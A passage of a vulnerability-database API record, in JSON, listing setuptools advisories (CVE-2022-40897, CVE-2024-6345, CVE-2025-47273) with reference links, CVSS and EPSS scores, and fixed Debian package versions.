"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40897", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40897" }, { "reference_url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages" }, { "reference_url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/" } ], "url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages/" }, { "reference_url": "https://pyup.io/vulnerabilities/CVE-2022-40897/52495", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://pyup.io/vulnerabilities/CVE-2022-40897/52495" }, { "reference_url": "https://pyup.io/vulnerabilities/CVE-2022-40897/52495/", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/" } ], "url": "https://pyup.io/vulnerabilities/CVE-2022-40897/52495/" }, { "reference_url": "https://security.netapp.com/advisory/ntap-20230214-0001", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://security.netapp.com/advisory/ntap-20230214-0001" }, { "reference_url": "https://security.netapp.com/advisory/ntap-20240621-0006", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://security.netapp.com/advisory/ntap-20240621-0006" }, { "reference_url": "https://setuptools.pypa.io/en/latest", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://setuptools.pypa.io/en/latest" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2158559", "reference_id": "2158559", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2158559" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R/", "reference_id": "ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R/" }, { "reference_url": "https://github.com/advisories/GHSA-r9hx-vwmv-q579", "reference_id": "GHSA-r9hx-vwmv-q579", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r9hx-vwmv-q579" }, { "reference_url": "https://security.gentoo.org/glsa/202405-10", "reference_id": "GLSA-202405-10", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-10" }, { "reference_url": "https://security.netapp.com/advisory/ntap-20230214-0001/", "reference_id": "ntap-20230214-0001", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/" } ], "url": "https://security.netapp.com/advisory/ntap-20230214-0001/" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2023:0835", "reference_id": "RHSA-2023:0835", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2023:0835" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2023:0952", "reference_id": "RHSA-2023:0952", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2023:0952" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2023:6793", "reference_id": "RHSA-2023:6793", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2023:6793" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2023:7395", "reference_id": "RHSA-2023:7395", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2023:7395" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2985", "reference_id": "RHSA-2024:2985", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2985" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:2987", "reference_id": "RHSA-2024:2987", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:2987" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:4421", "reference_id": "RHSA-2024:4421", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:4421" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6915", "reference_id": "RHSA-2024:6915", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6915" }, { "reference_url": "https://usn.ubuntu.com/5817-1/", "reference_id": "USN-5817-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5817-1/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H/", "reference_id": "YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H", "reference_type": "", "scores": [ { "value": "5.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-16T17:14:35Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/939277?format=api", "purl": "pkg:deb/debian/setuptools@52.0.0-4?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939278?format=api", "purl": "pkg:deb/debian/setuptools@52.0.0-4%2Bdeb11u1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%252Bdeb11u1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939276?format=api", "purl": "pkg:deb/debian/setuptools@65.6.3-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@65.6.3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939275?format=api", "purl": "pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939279?format=api", "purl": "pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-v6y5-h7b6-3qda" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@78.1.1-0.1%3Fdistro=trixie" } ], "aliases": [ "BIT-setuptools-2022-40897", "CVE-2022-40897", "GHSA-r9hx-vwmv-q579", "PYSEC-2022-43012" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ebnc-7f5a-effj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/18184?format=api", "vulnerability_id": "VCID-qt3x-msd9-tyct", "summary": "setuptools vulnerable to Command Injection via package URL\nA vulnerability in the `package_index` module of pypa/setuptools versions up to 69.1.1 allows for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. The issue is fixed in version 70.0.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-6345.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-6345.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-6345", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90282", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90343", "published_at": "2026-05-12T12:55:00Z" }, { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90327", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90311", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90281", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90251", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90267", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90273", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90291", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.05553", "scoring_system": "epss", "scoring_elements": "0.90275", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.05697", "scoring_system": "epss", "scoring_elements": "0.90434", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.05697", "scoring_system": "epss", "scoring_elements": "0.90437", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.05697", "scoring_system": "epss", "scoring_elements": "0.90438", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.05697", "scoring_system": "epss", "scoring_elements": "0.90427", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.05697", "scoring_system": "epss", "scoring_elements": "0.90425", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.07336", "scoring_system": "epss", "scoring_elements": "0.91665", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.07336", "scoring_system": "epss", "scoring_elements": "0.91749", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.07336", "scoring_system": "epss", "scoring_elements": "0.9175", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.07336", "scoring_system": "epss", "scoring_elements": "0.9167", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-6345" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6345", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6345" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/pypa/setuptools", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/setuptools" }, { "reference_url": "https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-15T13:33:16Z/" } ], "url": "https://github.com/pypa/setuptools/commit/88807c7062788254f654ea8c03427adc859321f0" }, { "reference_url": "https://github.com/pypa/setuptools/pull/4332", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/setuptools/pull/4332" }, { "reference_url": "https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-15T13:33:16Z/" } ], "url": "https://huntr.com/bounties/d6362117-ad57-4e83-951f-b8141c6e7ca5" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6345", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "7.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6345" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297771", "reference_id": "2297771", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297771" }, { "reference_url": "https://github.com/advisories/GHSA-cx63-2mw6-8hw5", "reference_id": "GHSA-cx63-2mw6-8hw5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cx63-2mw6-8hw5" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:10135", "reference_id": "RHSA-2024:10135", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:10135" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:11109", "reference_id": "RHSA-2024:11109", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:11109" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5000", "reference_id": "RHSA-2024:5000", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5000" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5002", "reference_id": "RHSA-2024:5002", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5002" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5040", "reference_id": "RHSA-2024:5040", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5040" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5078", "reference_id": "RHSA-2024:5078", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5078" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5084", "reference_id": "RHSA-2024:5084", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5084" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5137", "reference_id": "RHSA-2024:5137", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5137" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5279", "reference_id": "RHSA-2024:5279", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5279" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5389", "reference_id": "RHSA-2024:5389", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5389" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5530", "reference_id": "RHSA-2024:5530", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5530" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5531", "reference_id": "RHSA-2024:5531", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5531" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5532", "reference_id": "RHSA-2024:5532", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5532" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5533", "reference_id": "RHSA-2024:5533", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5533" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5534", "reference_id": "RHSA-2024:5534", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5534" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:5962", "reference_id": "RHSA-2024:5962", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:5962" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6220", "reference_id": "RHSA-2024:6220", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6220" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6309", "reference_id": "RHSA-2024:6309", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6309" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6311", "reference_id": "RHSA-2024:6311", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6311" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6312", "reference_id": "RHSA-2024:6312", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6312" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6488", "reference_id": "RHSA-2024:6488", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6488" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6611", "reference_id": "RHSA-2024:6611", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6611" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6612", "reference_id": "RHSA-2024:6612", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6612" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6661", "reference_id": "RHSA-2024:6661", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6661" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6662", "reference_id": "RHSA-2024:6662", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6662" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6667", "reference_id": "RHSA-2024:6667", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6667" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6726", "reference_id": "RHSA-2024:6726", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6726" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:6907", "reference_id": "RHSA-2024:6907", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:6907" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:7213", "reference_id": "RHSA-2024:7213", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:7213" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:7374", "reference_id": "RHSA-2024:7374", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:7374" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8168", "reference_id": "RHSA-2024:8168", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8168" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8170", "reference_id": "RHSA-2024:8170", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8170" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8171", "reference_id": "RHSA-2024:8171", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8171" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8172", "reference_id": "RHSA-2024:8172", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8172" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8173", "reference_id": "RHSA-2024:8173", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8173" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2024:8179", "reference_id": "RHSA-2024:8179", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2024:8179" }, { "reference_url": "https://usn.ubuntu.com/7002-1/", "reference_id": "USN-7002-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7002-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/939277?format=api", "purl": "pkg:deb/debian/setuptools@52.0.0-4?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939278?format=api", "purl": "pkg:deb/debian/setuptools@52.0.0-4%2Bdeb11u1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@52.0.0-4%252Bdeb11u1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939280?format=api", "purl": "pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939275?format=api", "purl": "pkg:deb/debian/setuptools@66.1.1-1%2Bdeb12u2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@66.1.1-1%252Bdeb12u2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939281?format=api", "purl": "pkg:deb/debian/setuptools@70.3.0-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@70.3.0-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/939279?format=api", "purl": "pkg:deb/debian/setuptools@78.1.1-0.1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-v6y5-h7b6-3qda" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/setuptools@78.1.1-0.1%3Fdistro=trixie" } ], "aliases": [ "CVE-2024-6345", "GHSA-cx63-2mw6-8hw5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qt3x-msd9-tyct" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/15026?format=api", "vulnerability_id": "VCID-uqed-9p12-7bdx", "summary": "setuptools is a package that allows users to download, build, install, upgrade, and uninstall Python packages. A path traversal vulnerability in `PackageIndex` is present in setuptools prior to version 78.1.1. An attacker would be allowed to write files to arbitrary locations on the filesystem with the permissions of the process running the Python code, which could escalate to remote code execution depending on the context. Version 78.1.1 fixes the issue.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-47273.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3", "scoring_elements": 